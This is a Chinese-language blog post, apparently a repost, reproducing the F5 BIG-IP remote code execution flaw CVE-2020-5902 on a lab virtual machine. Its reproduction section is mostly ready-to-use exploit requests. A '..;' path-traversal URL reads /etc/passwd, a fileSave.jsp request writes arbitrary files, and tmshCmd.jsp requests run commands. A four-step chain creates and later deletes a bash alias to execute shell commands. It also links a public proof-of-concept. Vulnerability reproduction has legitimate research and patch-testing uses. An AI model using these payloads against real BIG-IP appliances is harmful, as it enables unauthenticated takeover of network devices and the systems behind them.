F5 BIG-IP 远程代码执行漏洞复现
2020-07-08 18:19:45 Author: www.t00ls.net(查看原文) 阅读量:572 收藏

2020-07-08 14:32:05 3 171 1

漏洞详情

F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。

未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

影响版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

下载地址

需要注册登录

http://downloads05.f5.com/esd/download.sv?loc=downloads05.f5.com/downloads/2d436b59-25af-43c4-ab3f-9ebb1d6f5ee6/BIGIP-14.1.2-0.0.37.ALL-scsi.ova

漏洞复现

虚拟机用户名密码默认:root/default,第一次需要修改密码。输入config命令配置虚拟机网络

访问https://192.168.150.100

输入用户名密码:admin/a*****0(猜的默认密码为root密码)

然后第一次登录需要设置新密码

直接访问: https://192.168.150.100/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

既可以看到任意文件读取

任意文件写入

https://192.168.150.100/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id

命令执行:

https://192.168.150.130/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin


执行bash命令

  1. create+cli+alias+private+list+command+bash

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

  1. 将要执行命令写入tmp下文档中

/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/123&content=id

  1. 使用list命令来执行bash命令

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/123

  1. 删除第一步创建的cli

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list


项目地址

https://github.com/jas502n/CVE-2020-5902

小提示:

有时候再执行命令时,可能会遇到回显为空的情况,这种情况可能是demo搭建起来后没有web登陆过系统,登录一次系统后应该会正常


文章来源: https://www.t00ls.net/articles-57037.html
如有侵权请联系:admin#unsafe.sh